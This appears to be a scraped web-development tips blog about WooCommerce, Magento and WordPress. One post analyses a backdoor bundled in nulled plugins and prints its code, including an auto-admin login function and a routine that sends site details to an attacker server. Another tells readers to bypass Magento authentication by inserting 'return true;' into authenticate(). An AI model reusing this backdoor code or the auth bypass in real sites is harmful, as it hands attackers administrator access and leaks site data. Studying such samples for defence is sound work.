It happens that a woocommerce site has so many spam users. Now its tough to identify which user has order placed and which is spam users. To delete or clean spam users that doesn’t have any order placed, just create a php file and place it in your wordpress installation. And after that access that file in your browser. Before you run that scricpt , you create a full backup of your database. Place the below code in your PHP file.
Bypass Woocommerce logout confirmation Message
For Woocommerce user when user tries to logout from my account page then it ask for confirmation that if you really want to logout with a message that says “Are you sure you want to log out?” and sometimes this may be disgusting and disturbing for your user. If you want to bypass this for your user, then simply put below code to your theme functions.php file
Benefits of quality website development
Your website is the heart of your online presence so its quality determines how others perceive your business. To enhance your online presence you need a wellmade website, in other words a quality website.
Before we get to quality website development, we must know what a quality website is.
A quality website is a website that is well developed to attract the target audiences attraction and able to keep the customers in that site for longer periods of time by improving the contents, navigation, and other facilities of the website. A good website must be pleasing to the eye as well as engaging for the brain. A website with class.
What are the benefits of quality web development?
Your website is the face of your business. Quality website development ensures a well decorated appearance which gives a good first impression and helps attract customer/audience’s attraction. 94% of your business’s first impression comes from your web design. The first impression can have a huge impact on how they percieve your business, a good design keeps the customers attention for longer.
In this era where scams are everywhere it is important for websites to appear appealing, reliable and trustworthy. 75% of the credibility comes from the design. Your website must uphold your business in a way that looks legit enough to earn their trust. Earning the trust of the target audience increases the reliability of the website and helps to keep the brand identity consistent and strong. Increasing reliability helps attracts more of the target audience and resulting in the monetary benefit for the said website.
Any mistakes or error in the development work would lower the quality of the website and this may cost you the trust of your clients. In this era of scams your website should be designed in a way that erases the doubt in customers mind, helps them connect to your business .
Why would you consider quality web development?
Well why not? Todays world is that of competition. Every other website is focusing on making theirs more appealing to the customer than everyone else. More appealing meaning better in quality. And better the website the more number of audience you get.
Everyone loves a hassle-free life. No customer would choose to spend their time on a badly arranged website while there are plenty of better sites.
Quality website development helps create a website that is more able to engage with customers/clients than a lacking website, earning their trusts and increasing the efficiency of your business and your online presence.
Remote Access in Premium Plugins & Themes thewordpressclub[dot]org
One widespread belief among webmasters is that attackers typically only compromise websites in a couple of ways: by exploiting vulnerabilities or stealing login credentials.
Although these are certainly two of the more common attack vectors, another method is often overlooked — but the result is just as hazardous. Whenever an attacker can successfully trick a website owner into installing a backdoor on their website, they are able to accomplish the exact same goal: unauthorized access.
Nulled & Pirated Website Software
One extremely common method hackers use to trick website owners is to leverage nulled (or cracked/pirated) website software — especially premium third-party components. These might exist in the form of a WordPress plugin or theme, or perhaps a Magento extension.
Since these types of software usually require a fee to use or install, providers offer nulled or cracked versions that are “free” to download. What users might not realize is that “free” might come with a security price tag, and bad actors might be inclined to include a few malicious files or code snippets in a pirated version.
While not all nulled or cracked software have backdoors hidden within the code, attackers often consider this an excellent opportunity to distribute their malware. Using these components come with a lot of serious security implications, and backdoors can be difficult to detect until it’s too late.
Remote Access in Premium Plugins & Themes
Thewordpressclub[.]org is a nulled premium plugins and themes provider that offers a variety of “free” downloads for paid website components.
In their Terms of Service, they include a section on Remote Access:
As stated above, remote access within these files allows the provider to modify the plugin files’ code and create or modify database contents at their leisure — without notifying the website owner of any impending changes.
Remote access for this provider is accomplished through two files which are bundled within the nulled software download:
rms-script-ini.php rms-script-mu-plugin.php
The following lines are injected at the beginning of the main plugin or theme file.
The first file, rms-script-ini.php, is evaluated with a require_once() PHP function which uses the custom function rms_remote_manager_init() to initialize the activation remote handler.
require_once('rms-script-ini.php'); rms_remote_manager_init(__FILE__, 'rms-script-mu-plugin.php', false, false);
This malicious script, rms-script-ini.php, is also responsible for initializing other functions — such as creating a backdoor located at ./wp-contents/mu-plugins/rms_unique_wp_mu_pl_fl_nm.php.
$newname=WPMU_PLUGIN_DIR.$this->DS.’rms_unique_wp_mu_pl_fl_nm.php’;
The backdoor is created with the filename rms_unique_wp_mu_pl_fl_nm.php, but the code it employs is copied from a second different PHP file, rms-script-mu-plugin.php, which is bundled with the nulled software download.
This second rms-script-mu-plugin.php file is responsible for a large portion of the heavy lifting, ultimately granting administrative privileges to the bad actor.
First, it checks for existing WordPress users through get_users(), querying for users with administrator role privileges. Then, it sets the wp-admin cookie to authenticate administrative access for whichever user it identifies:
// REMOTE LOGIN function remote_sign_in () { if(!$_GET['token'] && is_user_logged_in()) ... $users = get_users(); foreach($users as $user ) { $user_id = $user->ID; $data = get_userdata( $user_id ); $roles = $user->roles; if (in_array('administrator', $roles)) { log_me_in($user); exit; }} add_action('init', 'remote_sign_in' ); function log_me_in ($user) { if ( !is_wp_error( $user ) ) { wp_clear_auth_cookie(); wp_set_current_user ( $user->ID ); wp_set_auth_cookie ( $user->ID ); $redirect_to = user_admin_url(); wp_safe_redirect( $redirect_to ); exit(); }} //END REMOTE LOGIN
The rms-script-mu-plugin.php file, which is loaded and required to run the nulled software, also possesses a feature that sends out WordPress installation information relating to the website to a third-party web server controlled by the attackers.
/* ------------Register Config Variables------------ */ $GLOBALS['rms_report_to'] = 'https://managerly[.]org/wp-admin/admin-ajax.php'; ... // Gather data $data= [ 'title' => get_bloginfo('name'), 'url' => get_home_url(), 'ajax_url' => admin_url('admin-ajax.php'), 'ip' => $_SERVER['SERVER_ADDR'], 'tp' => $name, 'tp_status' => $activating, 'hash' => $hash, 'show_to_logged'=>$show_post ]; // send to rms $result = send_rms_curl_request('rms_ping_from_the_universe', ['site_data' => json_encode($data)]);
How to recover
Once a nulled software provider has administrator privileges for your WordPress or Magento website, they can easily begin to post content by modifying database contents whenever they want.
It’s in an attacker’s best interest to maintain unauthorized access to the site’s environment, so you can bet it includes some nifty features to evade detection or conceal indicators of compromise. For example, there are ways for attackers to manipulate the CSS display of the wp-admin interface so that you might not even be able to see posts that they created on your WordPress website.
And while you can delete the nulled WordPress plugin in wp-admin, it does not remove everything. In this particular piece of malware, the backdoor created upon installation will still exist at ./wp-contents/mu-plugins/rms_unique_wp_mu_pl_fl_nm.php.
On top of that, other backdoors can easily be installed simultaneously (or at their leisure), since attackers have the ability to create new backdoors on any website using nulled and infected software from thewordpressclub[.]org.
The best way to avoid this type of compromise is to avoid using any nulled or cracked software on your website. Don’t blindly trust links in forums or websites that offer downloads that don’t belong to them.
Get your plugins, extensions, themes, and other third-party components from reputable sources. If you need a free WordPress plugin, try searching for one in the official WordPress repository.
Change the color of SVG icon using CSS
I was trying to change the color of a SVG icon using css. But was not able to do it of my own. Then I googled it and got a nice solution. It’s so simple. You just need to take the class or id or simply take the svg selector if you want to mention all svg in the site then just simply do your css.
Like below
#area svg {
{
color: blue;
fill: currentColor;
}
And like that.. So simple
How To Reset Magento Password
Today I am going to show you that if you forgot your magento admin password then how to reset it.
To reset it there are 2 ways. One you can do it via phpmyadmin. I am not going to discuss it here cause I had a problem with that. I am going to discuss using ftp that worked for me.
Through FTP open the class Mage_Admin_Model_User located at app\code\core\Mage\Admin\Model\User.php
Next find the authenticate() function around line no: 225. Inside the authenticate function, this code is written
$this
->loadByUsername(
$username
);
You need to add the line return true; after this i.e
$this
->loadByUsername(
$username
);
return
true;
Rename Woocommerce Tabs
Renaming the tabs in single product view of woocommerce products is not that hard to do. Just adding a filter will do the trick. You can rename any tabs there. I am just showing you here one example so that you understand what I meant. Just check the below code .
Just customize the code according to your need. Here you see I have renamed the description tab with “Full Description” . You can do your own.
Same way other tab can be renamed .
Remove Description Tab in Woocommerce
If you want to remove any tabs in woocommerce single product view under the image then there is a simple way to do so. Just you need to add a filter hook in your theme function.php file and you are done. Using this filter you can remove all of these 3 tabs or whatever you want to remove from woocommerce single product view. For example please consider the below code.
In this code you will understand easily as the code is commented out well. unset is used to remove tabs there you can see. If you want to remove only one tabs then comment out that line there in the code and that’s the process to go
Creating a parent WordPress menu theme option
We can create a theme option easily using option tree plugin. You can use this plugin as plugin mode and also you can use this plugin inside your theme folder. To use it as plugin is very simple. Just install the plugin and you will have the option to use it in the WordPress dashboard menu. Check the below image if you install the plugin and use it as a plugin.
Now I am going to show you two way in the theme mode. You can use the option tree plugin in the them mode also. to do so download the plugin first from WordPress.org and then copy the full folder into your theme folder. After that just add the below code to your theme function to load the option tree into your theme.
After that you just add theme option and integrate it to your theme code.
Now the way I am going to tell you is what I was looking for many days. I wanted the theme option menu as a parent menu in WordPress dashboard and not under Appearance menu. You can do that by following the below steps
After downloading and copying the option tree into your theme now Edit file or functions-admin.php (the Option-tree folder -> includes), is used to change the settings of data on option-tree, see the following picture:
1. Is used to adjust the position of menus and icons, I think the default is the best (theme.php), if you want to try another menu position, please replace theme.php with index.php or empty (”).
Example : index.php
'parent_slug' => apply_filters( 'ot_theme_options_parent_slug', 'index.php' ),
Example : empty
'parent_slug' => apply_filters( 'ot_theme_options_parent_slug', '' ),
2. Position is used to set the menu order.
'position' => apply_filters( 'ot_theme_options_position', __( '5', 'option-tree' ) ),
3. Is used to change page title.
'page_title' => apply_filters( 'ot_theme_options_page_title', __( 'This is Page Title', 'option-tree' ) ),
4. Is used to change menu name.
'menu_title' => apply_filters( 'ot_theme_options_menu_title', __( 'Azoncast-V2 Options', 'option-tree' ) ),
5. Is used to change menu icon
'icon_url' => apply_filters( 'ot_theme_options_icon_url', __( 'Icon Url', 'option-tree' )),
How to get the tag name without link
You can get the tag name without permalink to it by using below code which is simple.. It is a simple foreach loop that returns the name of the specific category